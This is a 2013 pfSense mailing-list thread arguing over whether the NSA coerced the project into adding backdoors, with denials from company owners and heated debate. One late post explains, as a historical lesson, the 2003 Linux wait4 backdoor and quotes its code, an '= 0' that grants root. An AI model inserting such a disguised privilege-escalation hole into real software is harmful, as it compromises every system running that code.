On 2013-10-09 18:20, Paul Kunicki wrote: I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response Exactly, Paul, you got my point! although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ? @your doubts about the NSA/FBI/put the name of your government's surveillance institution here bothering with smaller companies such as Electric Sheep Fencing LLC (formerly BSD perimeter) and their niche product pfSense: Please take these 2 things into account: 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys install a black-box at their premises). Lavabit did not agree - and they shut him down. https://en.wikipedia.org/wiki/Lavabit. Officially they wanted to force Lavabit to just hand out Edward Snowden's emails (bad enough), but in reality they wanted to gain access to all emails of Lavabit by receiving the SSL masterkeys and by placing the blackbox at their premises, which rendered the whole service useless. 2. Routers/Gateways/Firewalls are highly interesting for big brother. Read e.g. this article NSA Laughs at PCs, Prefers Hacking Routers and Switches (https://mailman.stanford.edu/pipermail/liberationtech/2013-September/011287.html) So, combining those 2 facts - the fact that the NSA/FBI/etc. prefer to infiltrate routers with the fact that they very well bother knocking the doors of small businesses with niche products, I guess my question is quite legitimate! Greetings Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
(TIC mode: on) I think it’s obvious that: - ESF is a front for the NSA - the acquisition which closed last year was really just about gaining control of a critical component of Internet infrastructure. - the delays getting 2.1 out the door were exclusively about getting some last-minute backdoor code installed. AYBAB2U, baby! (TIC mode: off) On Oct 9, 2013, at 5:56 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 18:20, Paul Kunicki wrote: I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response Exactly, Paul, you got my point! although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ? @your doubts about the NSA/FBI/put the name of your government's surveillance institution here bothering with smaller companies such as Electric Sheep Fencing LLC (formerly BSD perimeter) and their niche product pfSense: Please take these 2 things into account: 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys install a black-box at their premises). Lavabit did not agree - and they shut him down. https://en.wikipedia.org/wiki/Lavabit. Officially they wanted to force Lavabit to just hand out Edward Snowden's emails (bad enough), but in reality they wanted to gain access to all emails of Lavabit by receiving the SSL masterkeys and by placing the blackbox at their premises, which rendered the whole service useless. 2. Routers/Gateways/Firewalls are highly interesting for big brother. Read e.g. this article NSA Laughs at PCs, Prefers Hacking Routers and Switches (https://mailman.stanford.edu/pipermail/liberationtech/2013-September/011287.html) So, combining those 2 facts - the fact that the NSA/FBI/etc. prefer to infiltrate routers with the fact that they very well bother knocking the doors of small businesses with niche products, I guess my question is quite legitimate! Greetings Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/9/2013 11:32 AM, Robert Guerra wrote: From the news i've read... a couple of questions for the pfsense developers come to mind: 1. Random Number generation - NSA is reported to have weakened several random number generators and/or introduced vulnerabilities. - What is used in PFsense? We use the RNG from FreeBSD, which can be assisted by hardware, assuming you trust the hardware. http://en.wikipedia.org/wiki//dev/random#FreeBSD 2. Crypto - Certain protocols have been deliberately weakened, have options that turn on crypto and/or known to contain backdoors. - a robust discussion on how to enable the highest standard of encryption and privacy protective options would be most welcome That is still something that is up for debate. I'm not sure anyone has really accurately identified which are good and which might be compromised from a cryptographic standpoint with high confidence. There are some standards that have been called into question simply because the NSA/DOD/etc recommend them. Are they recommending them because they are strong, or because they have been compromised and they want people to use them? http://www.nsa.gov/business/programs/elliptic_curve.shtml http://en.wikipedia.org/wiki/NSA_Suite_B http://en.wikipedia.org/wiki/Elliptic_curve_cryptography#NIST-recommended_elliptic_curves If compromised ciphers could be positively identified, we could actively discourage their use or disable them as needed. The problem with doing that is compatibility and inertia. PPTP has been broken 100%, but people still use it because they don't want to change, management won't let them change, they have a crazy use case for it, or simply because they don't care. We have placed a large red warning on PPTP for the last few versions and people still keep using it, knowing it's not much better than transmitting in the clear. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 19:03, Jim Thompson wrote: (TIC mode: on) Sorry, but I guess the whole matter - not only concerning pfSense, but the current threat to our civilization by our criminal governments as a whole - is much too serious for any TIC-modes.. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 19:03, Jim Thompson wrote: (TIC mode: on) Sorry, but I guess the whole matter - not only concerning pfSense, but the current threat to our civilization by our criminal governments as a whole - is much too serious for any TIC-modes.. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
The big problem with asking the question Has the NSA required you to add a back door? is that no small company that wants to say in business can or will say yes (If they do, no one will trust/use the product unless forced themselves). The company will agree/be forced to say no. How does one tell that no from an authentic no? Therefore, once trust is question, the only way to be sure is to do the self review suggested earlier... However, from my perspective, the code in pfSense is more like to be secure than any commercial, closed source solution. See prior threads about FreeBSD security. Walter On Wed, Oct 9, 2013 at 9:10 AM, Thinker Rix thinke...@rocketmail.comwrote: On 2013-10-09 19:03, Jim Thompson wrote: (TIC mode: on) Sorry, but I guess the whole matter - not only concerning pfSense, but the current threat to our civilization by our criminal governments as a whole - is much too serious for any TIC-modes.. __**_ List mailing list List@lists.pfsense.org http://lists.pfsense.org/**mailman/listinfo/listhttp://lists.pfsense.org/mailman/listinfo/list -- The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 12:10:00PM -0400, Jim Pingle wrote: On 10/9/2013 11:32 AM, Robert Guerra wrote: From the news i've read... a couple of questions for the pfsense developers come to mind: 1. Random Number generation - NSA is reported to have weakened several random number generators and/or introduced vulnerabilities. - What is used in PFsense? We use the RNG from FreeBSD, which can be assisted by hardware, assuming you trust the hardware. http://en.wikipedia.org/wiki//dev/random#FreeBSD I've come across that when researching making one-time pads on pfSense, using a hardware RNG. Is there a way to have a hardware RNG (multiple, if present, e.g. AMD Geode and HiFn in an ALIX) mix in entropy into Yarrow, instead of overriding it? The later behavior is definitely not what I want. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:38 PM, Thinker Rix thinke...@rocketmail.com wrote: My main question was not if the code includes bad things, but if the company behind pfSense has been approached (yet) by authorities to comply with their Orwellian global police state phantasy. already answered. Twice. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime. Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Which makes asking the question quite irrelevant. -Adam Thinker Rix thinke...@rocketmail.com wrote: ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 9, 2013 at 10:38 AM, Jim Thompson j...@netgate.com wrote: So asking the question is stupid(*), because a lie is indistinguishable from the truth. I disagree on that point. Even if one is sure to get a no answer, regardless of the truth, it is still useful to ask the question for at least two reasons I can think of: 1. To get the response on record. The responders can be held accountable should it ever come out they knowingly lied. 2. To examine the response for credibility. A simple yes or no answer might not yield much, but such is rarely the case. If the answer is delayed, unclear, couched in a bunch of rhetoric or handwaving, delayed or avoided, then any or all of these things will be taken into account by those asking the question or observing the response. This is a principle that is understood by courts of law, psychologists, interrogators, and people of intuition. db ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Linus Torvalds was asked the same question in a QA session about linux. He said 'no' while nodding his head up and down. Sent via BlackBerry from T-Mobile -Original Message- From: David Burgess apt@gmail.com Sender: list-bounces@lists.pfsense.orgDate: Wed, 9 Oct 2013 10:46:10 To: pfSense support and discussionlist@lists.pfsense.org Reply-To: pfSense support and discussion list@lists.pfsense.org Subject: Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others? ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 11:42:31AM -0500, Adam Thompson wrote: Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime. All assuming the company in question resides in the US, or has significant presence in the US. There is, of course, considerable strong-arming and informal co-operation going on behind the scenes, so geography is not exactly a good protection. I've personally given up on any commercial software, and moved to purely community-built tools, and will take considerable protection now that we know that Ft. Meade is in the business of hacking end users and companies. Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Which makes asking the question quite irrelevant. The question is useful, since it produced this thread. As I suggested, if you're not trusting pfSense, you can always manually verify the rules generated by it, and load it into a pf-speaking device you consider trustable. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 06:50:53PM +0200, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. Sorry, this is not BS. The situation has changed, and we have to adapt. It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:46 PM, David Burgess apt@gmail.com wrote: On Wed, Oct 9, 2013 at 10:38 AM, Jim Thompson j...@netgate.com wrote: So asking the question is stupid(*), because a lie is indistinguishable from the truth. I disagree on that point. Even if one is sure to get a no answer, regardless of the truth, it is still useful to ask the question for at least two reasons I can think of: 1. To get the response on record. The responders can be held accountable should it ever come out they knowingly lied. 2. To examine the response for credibility. A simple yes or no answer might not yield much, but such is rarely the case. If the answer is delayed, unclear, couched in a bunch of rhetoric or handwaving, delayed or avoided, then any or all of these things will be taken into account by those asking the question or observing the response. This is a principle that is understood by courts of law, psychologists, interrogators, and people of intuition. IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. It doesn’t contribute anything to the project. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Jim, thank you for your quick reply! On 2013-10-09 18:59, Jim Pingle wrote: On 10/9/2013 11:20 AM, Paul Kunicki wrote: I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ? As far as I'm aware, nobody has contacted us, but if they did I may not know. They aren't really interested in end-user firewalls, they want infrastructure routers. Do you think that there might be a chance to get an official statement of ESF, maybe without any ifs and buts? This would really help in this uncertain times that we all have to suffer currently. Thank you, Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn't approached us about pfSense, or adding a back door, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? Thank you Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agency's have done similar things, so if you starting asking, you discover that the major governments are trying to do this and have succeed more often than we would like. Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits? Walter On Wed, Oct 9, 2013 at 9:51 AM, Eugen Leitl eu...@leitl.org wrote: On Wed, Oct 09, 2013 at 11:42:31AM -0500, Adam Thompson wrote: Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime. All assuming the company in question resides in the US, or has significant presence in the US. There is, of course, considerable strong-arming and informal co-operation going on behind the scenes, so geography is not exactly a good protection. I've personally given up on any commercial software, and moved to purely community-built tools, and will take considerable protection now that we know that Ft. Meade is in the business of hacking end users and companies. Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Which makes asking the question quite irrelevant. The question is useful, since it produced this thread. As I suggested, if you're not trusting pfSense, you can always manually verify the rules generated by it, and load it into a pf-speaking device you consider trustable. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list -- The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
I also understand your point though, since the software is OSS, it should be fairly easy to check for backdoors :) Yes, you *could* check. But does anybody? Check the *entire* code and get the big picture? Realistically speaking, that wouldn't be enough anyways. What is the percentage of pfSense users that download source and build it themselves vs. download the prebuilt binary? Regards, -Jeppe ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Some people in this discussion assume that the principals of ESF could not be forced to lie by the US government, under threat of lawsuits, financial ruin, incarceration and not seeing their children grow up. I find this assumption awfully naive. I think it's unlikely that ESF was even asked to cooperate, but I don't believe a denial is all that useful under the circumstances, and asking for it again and again is obnoxious. Gé On Wed, Oct 9, 2013 at 10:07 AM, Jeppe Øland jol...@gmail.com wrote: I also understand your point though, since the software is OSS, it should be fairly easy to check for backdoors :) Yes, you *could* check. But does anybody? Check the *entire* code and get the big picture? Realistically speaking, that wouldn't be enough anyways. What is the percentage of pfSense users that download source and build it themselves vs. download the prebuilt binary? Regards, -Jeppe ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list -- Gé ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:56 PM, Eugen Leitl eu...@leitl.org wrote: On Wed, Oct 09, 2013 at 06:50:53PM +0200, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. Sorry, this is not BS. The situation has changed, and we have to adapt. The situation did not change with the Snowden revelations. Anyone following along has known what was going on for at least the last decade. The only thing that has changed is that now outrage has become popular. The New York Times’ James Risen and Laura Poitras penned an article a couple weeks ago titled ‘NSA Gathers Data on Social Connections of U.S. Citizens” in which they make the claims based on documents leaked by “Edward Snowden”. “… the National Security Agency has been exploiting its huge collections of data to create sophisticated graphs of some Americans’ social connections that can identify their associates, their locations at certain times, their traveling companions and other personal information, according to newly disclosed documents and interviews with officials… … according to documents provided by Edward J. Snowden… … The new disclosures add to the growing body of knowledge in recent months about the N.S.A.’s access to and use of private information concerning Americans” New York Times See: http://www.nytimes.com/2013/09/29/us/nsa-examines-social-networks-of-us-citizens.html?pagewanted=all William E. Binney (perhaps you should google him) was speaking directly to Laura Poitras when he said these words slightly over a year ago: “The purpose is to be able to monitor what people are doing. You build social networks for everybody that then turns into the graph then you index all that data to the graph which means you can then pull out a “community” with an outline of the life of everyone in the community. And if you carried it over time from 2001 up you have 10 years of their life you can lay out in a timeline. That involves anybody in the country” William E. Binney, Aug. 2012, speaking to Laura Poitras in HER documentary The Program http://www.nytimes.com/2012/08/23/opinion/the-national-security-agencys-domestic-spying-program.html?_r=0 Do you think she forgot this interview while she was writing an article in the New York Times last month that she was told this “groundbreaking” revelation long ago? Because she never mentions Binney in her new article. Why? Seriously, ask yourself why. She also doesn’t mention key things like “Stellar Wind” or NarusInsight. These are real programs. For all we know, Pyramid is nothing more than a Powerpoint deck created for a psyop purposes. Maybe it’s real, and maybe this is all a smokescreen for something else. How many of you people now questioning pfSense understand that Edward Snowden despised classified leaks in back in 2009, and that he was not always the champion of transparency that he has apparently become. ArsTechnica published IRC chats where he railed against a New York Times story about the U.S. rejecting an Israeli request for aid to attack an Iranian nuclear site and the United States' covert efforts to sabotage Iran's nuclear program. Are they TRYING to start a war? Jesus christ. they're like wikileaks, he said in the chat. they're just reporting, dude, said another user. moreover, who the fuck are the anonymous sources telling them this? he said. those people should be shot in the balls. Snowden, in the chat, also criticized reporting on classified information: is it unethical to report on the government's intrigue? asked a user in the chat. VIOLATING NATIONAL SECURITY? no. he responded. meh. national security. responded the user. Um, YS.that shit is classified for a reason, he said. it's not because oh we hope our citizens don't find out. it's because this shit won't work if iran knows what we're doing. I am so angry right now. This is completely unbelievable, Snowden said. http://arstechnica.com/tech-policy/2013/06/exclusive-in-2009-ed-snowden-said-leakers-should-be-shot-then-he-became-one/3/ It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. So “be a pussy” is your answer to handle this? jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:03 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn’t approached us about pfSense, or adding a “back door”, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? There are three individuals that own ESF, and can speak for the company. Chris Buechler Jamie Thompson (my wife) Me. how official do you want an answer to be? ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Adam, On 2013-10-09 19:42, Adam Thompson wrote: Which makes asking the question quite irrelevant. I do not think so. Greetings Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. May I ask again if you are an staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:04, Walter Parker wrote: About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agency's have done similar things, so if you starting asking, you discover that the major governments are trying to do this and have succeed more often than we would like. Yes, it is horrifying. Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits I do not want to sue or otherwise harm anybody. I only asked a very simple question and now read the answers. Very interesting answers, I think. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 17:20, Thinker Rix wrote: Dear pfsense-team, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Hello all! Thank you for all your reactions so far! Reading the whole thread, I can't help but feel two things: 1. Quite a bit of aggression of some users. Why? Because I asked a simple and naively straight-forward question? Strange, isn't it? 2. A nothing to worry here, just continue walking attitude of some others I think this is strange. And by the way: It is not only some question, but *the* question, actually, if someone remembers what we are talking about here! We are talking about a network security software - so what on earth is more normal than asking if this software *is* secure!? Should we all just look away and continue our business as usual, as if nothing has happened the last year out there on the globe? We all know that the governments currently force on a daily base one company after the other to comply to their New World Order-Orwellian-global-surveillance phantasies and make them compromise their software or service. So I find it absolutely NECESSARY to clear out if pfSense has fallen (already) to them, or not. Network security is THE major reason for using pfSense. So it should be the most important question for all of us, isn't it? By my comprehension, everyone who says that this is a silly question or that it is some unimportant thought no one should further bother thinking about in detail, is either confused, or trying to conceal something. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:36 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 20:04, Walter Parker wrote: About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agency's have done similar things, so if you starting asking, you discover that the major governments are trying to do this and have succeed more often than we would like. Yes, it is horrifying. Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits I do not want to sue or otherwise harm anybody. I only asked a very simple question and now read the answers. Very interesting answers, I think. Not interesting, just simple ego stroking. As for those who want to read the source to find bugs … Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy. But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change. What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code: if ((options == (__WCLONE|__WALL)) (current-uid = 0)) retval = -EINVAL; [Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.] A casual reading by anyone less than expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful (and somewhat) expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current-uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero. Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor. This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up. Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know. We still dont have a report on the kernel.org hack of 2011. Why not? Many people say, calm down, its git they can’t have inserted backdoors etc without messing up the git history/changelog/hashes/whatever. But what if git was modified and backdoored previously to hide some objects/changes? How would such an attack work? Lets say you discover a problem in git, which allows you to omit changesets in its output. How would that work to backdoor the kernel? Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:16, Gé Weijers wrote: Some people in this discussion assume that the principals of ESF could not be forced to lie by the US government, under threat of lawsuits, financial ruin, incarceration and not seeing their children grow up. Gee, quite a frightening regime. Someone should tell the USA to send some of their troops in there to remove this suppressing regime and free those poor devils over there by spreading some of their democracy, as they do all over the planet.. Ops, I think I got something wrong here ;-) I find this assumption awfully naive Do you thinks so? Me, not, though it might seem so at first sight. I think it's unlikely that ESF was even asked to cooperate, Interesting thought, may I ask you why you think so? but I don't believe a denial is all that useful under the circumstances What do you mean? It would not be useful not to comply, but better to just compromise that what you do so that you are left in peace? and asking for it again and again Actually I only asked once is obnoxious. Since when can a naive question, as you called it, be obnoxious? And why do you think asking a security software project if it is secure is obnoxious? I think it is the most important question of all. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:22, Jim Thompson wrote: On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. This is correct. I do not understand where I am supposed to have thrown any stones or insult anybody, indeed. If you would like to show me, I would really be thankful. May I ask again if you are an staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim Thank you for the info. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 19:49, Christian Borchert wrote: Linus Torvalds was asked the same question in a QA session about linux. He said 'no' while nodding his head up and down. Sent via BlackBerry from T-Mobile Exactly. Frightening, isn't it? Awkwardly the audience started laughing about that... Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:18, Jim Thompson wrote: On Oct 9, 2013, at 7:03 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn’t approached us about pfSense, or adding a “back door”, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? There are three individuals that own ESF, and can speak for the company. Chris Buechler Jamie Thompson (my wife) Me. Thank you for this information. how official do you want an answer to be? Since you are a co-owner of ESF who is entitled to speak for the company, as you say, I believe that your answer is as official as it gets and I am thankful for this clear statement of yours! Thank you very much. I only wonder what the aggression was needed for. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:41 PM, Thinker Rix thinke...@rocketmail.com wrote: We all know that the governments currently force on a daily base one company after the other to comply to their New World Order-Orwellian-global-surveillance phantasies and make them compromise their software or service. So I find it absolutely NECESSARY to clear out if pfSense has fallen (already) to them, or not. Network security is THE major reason for using pfSense. So it should be the most important question for all of us, isn't it? By my comprehension, everyone who says that this is a silly question or that it is some unimportant thought no one should further bother thinking about in detail, is either confused, or trying to conceal something. You just want to have a discussion. Perhaps it makes you feel important, I don’t know. Your Alex Jonesian “New World Odor” rhetoric is tiring. Your NECESSARY discussion is not, because in the end analysis the discussion you want to have is orthogonal to the subject. You should instead only depend on you and your tools to ensure your security. Asking me (or Chris, or Jamie) to answer the question puts everyone in a position where nothing can be learned, so it is useless, rather than NECESSARY. Until you understand and accept this, your messages are mere platitudes. Look, The integrity and bravery Ladar Levison has shown in his fight is impressive. He has definitely earned enough cred to restart his business outside the US and be very successful, but my hope is that he does not. We should celebrate Ladar for making the decision to put himself at risk in order to protect his users, but I think we should be careful not to forget that Ladar was forced to make that decision because the security of Lavabit was all a complete and total hand wave. There are already technologies such as PGP, S/MIME, smart cards, and the dozens of other ways we can have secure email without relying on a trusted third party such as Lavabit. Lavabit could respond to a demand for plaintext, if Ladar were willing to do so (and in the end, he was, for a particular user); on the other hand, Google cannot give anyone access to the plaintexts of S/MIME encrypted messages that I send through their servers because of technical barriers. That is the point of doing your encryption locally, and that is why security and privacy are not, and never will be, a service.(*) This wasn't untested water, either. The exact same thing happened to Hushmail in 2007 for the exact same reason, and should have been evidence enough that the model isn't viable, even for a non-US company. http://www.wired.com/threatlevel/2007/11/encrypted-e-mai/ So again, I think we should definitely support Ladar as a person, but we also need to be careful not to confuse that with supporting Lavabit, (the company) which was a very real danger that should never be repeated again (again). How you interpret this and subsequently apply it to ESF and/or pfSense is up to you. Jim (*) if you think about it for very long, it also shows that Snowden is not the Ür-hacker than the press wants to make him. His communications via Lavabit only gave the appearance of security, and he wasn’t smart enough to understand same. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
